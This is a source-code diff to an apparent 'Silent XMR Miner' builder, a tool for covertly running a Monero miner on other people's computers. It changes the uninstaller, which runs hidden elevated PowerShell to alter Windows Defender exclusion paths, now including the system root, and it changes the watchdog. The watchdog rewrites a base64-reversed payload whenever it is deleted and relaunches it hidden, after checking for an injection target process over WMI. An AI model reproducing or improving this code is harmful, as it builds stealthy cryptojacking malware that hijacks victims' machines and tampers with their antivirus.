--- a/SilentXMRMiner/Resources/Uninstaller.cs
+++ b/SilentXMRMiner/Resources/Uninstaller.cs
@@ -1,6 +1,7 @@
 using System;
 using System.IO;
 using System.Reflection;
+using System.Security.Principal;
 using System.Security.Cryptography;
 using System.Runtime.InteropServices;
 using System.Text;
@@ -17,9 +18,12 @@
 [assembly: Guid("%Guid%")]
-public partial class Uninstaller
+public partial class RUninstaller
 {
     public static string rbD = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\" + RGetString("#LIBSPATH");
+#if DefSystem32
+    public static string rbD2 = Environment.SystemDirectory + @"\" + RGetString("#LIBSPATH");
+#endif
     public static void Main()
     {
@@ -110,6 +114,9 @@ public static void Main()
             try
             {
                 Directory.Delete(rbD, true);
+#if DefSystem32
+                Directory.Delete(rbD2, true);
+#endif
 #if DefInstall
                 File.Delete(PayloadPath);
 #endif
@@ -128,7 +135,7 @@ public static void Main()
             Process.Start(new ProcessStartInfo
             {
                 FileName = "cmd",
-                Arguments = "/c powershell -Command Remove-MpPreference -ExclusionPath '%cd%' & powershell -Command Remove-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Remove-MpPreference -ExclusionPath '%AppData%' & powershell -Command Remove-MpPreference -ExclusionPath '%Temp%' & exit",
+                Arguments = "/c powershell -Command Remove-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Remove-MpPreference -ExclusionPath '%AppData%' & powershell -Command Remove-MpPreference -ExclusionPath '%Temp%' & powershell -Command Remove-MpPreference -ExclusionPath '%SystemRoot%' & exit",
                 WindowStyle = ProcessWindowStyle.Hidden,
                 CreateNoWindow = true,
                 Verb = "runas"
diff --git a/SilentXMRMiner/Resources/Watchdog.cs b/SilentXMRMiner/Resources/Watchdog.cs
index c35be22..f016776 100644
--- a/SilentXMRMiner/Resources/Watchdog.cs
+++ b/SilentXMRMiner/Resources/Watchdog.cs
@@ -3,6 +3,7 @@
 using System.IO;
 using System.Management;
 using System.Reflection;
+using System.Security.Principal;
 using System.Security.Cryptography;
 using System.Runtime.InteropServices;
 using System.Text;
@@ -20,7 +21,7 @@
 [assembly: Guid("%Guid%")]
-public partial class Program
+public partial class RProgram
 {
     public static string rxM = "";
     public static string rplp = "";
@@ -47,57 +48,25 @@ public static void RWDLoop()
     {
         try
         {
+            if (!File.Exists(rplp))
+            {
+                checkcount = 0;
+                File.WriteAllBytes(rplp, Convert.FromBase64String(rxM).Reverse().ToArray());
+                RStart();
+            }
             if (!RCheckProc())
             {
-                if (!File.Exists(rplp))
-                {
-                    File.WriteAllBytes(rplp, Convert.FromBase64String(rxM).Reverse().ToArray());
-                    Process.Start(new ProcessStartInfo
-                    {
-                        FileName = rplp,
-                        WindowStyle = ProcessWindowStyle.Hidden,
-                        CreateNoWindow = true,
-                    });
-                }
-                else if (checkcount < 2)
+                if (checkcount < 2)
                 {
                     checkcount += 1;
                 }
                 else
                 {
                     checkcount = 0;
-                    Process.Start(new ProcessStartInfo
-                    {
-                        FileName = rplp,
-                        WindowStyle = ProcessWindowStyle.Hidden,
-                        CreateNoWindow = true,
-                    });
-                }
-            }
-            else
-            {
-                checkcount = 0;
-                if (!File.Exists(rplp))
-                {
-                    File.WriteAllBytes(rplp, Convert.FromBase64String(rxM).Reverse().ToArray());
-                    Process.Start(new ProcessStartInfo
-                    {
-                        FileName = rplp,
-                        WindowStyle = ProcessWindowStyle.Hidden,
-                        CreateNoWindow = true,
-                    });
+                    RStart();
                 }
             }
-
-            int startDelay = 0;
-            if (int.TryParse("#STARTDELAY", out startDelay) && startDelay > 0)
-            {
-                Thread.Sleep(startDelay * 1000 + 5000);
-            }
-            else
-            {
-                Thread.Sleep(10000);
-            }
+            Thread.Sleep(startDelay * 1000 + 5000);
             RWDLoop();
         }
@@ -110,13 +79,24 @@ public static void RWDLoop()
         }
     }
+    public static void RStart()
+    {
+        Process.Start(new ProcessStartInfo
+        {
+            FileName = rplp,
+            WindowStyle = ProcessWindowStyle.Hidden,
+            WorkingDirectory = Path.GetDirectoryName(rplp),
+            CreateNoWindow = true,
+        });
+    }
+
     public static bool RCheckProc()
     {
         try
         {
             var options = new ConnectionOptions();
             options.Impersonation = ImpersonationLevel.Impersonate;
-            var scope = new ManagementScope(@"\\" + Environment.UserDomainName + @"\root\cimv2", options);
+            var scope = new ManagementScope(@"\root\cimv2", options);
             scope.Connect();
             string wmiQuery = string.Format("Select CommandLine from Win32_Process where Name='{0}'", "#InjectionTarget");
diff --git a/SilentXMRMiner/Silent XMR Miner Builder.vbproj b/SilentXMRMiner/Silent XMR Miner Builder.vbproj
index ad7057e..8f3249a 100644
--- a/SilentXMRMiner/Silent XMR Miner Builder.vbproj
+++ b/SilentXMRMiner/Silent XMR Miner Builder.vbproj
@@ -203,9 +203,6 @@ - - -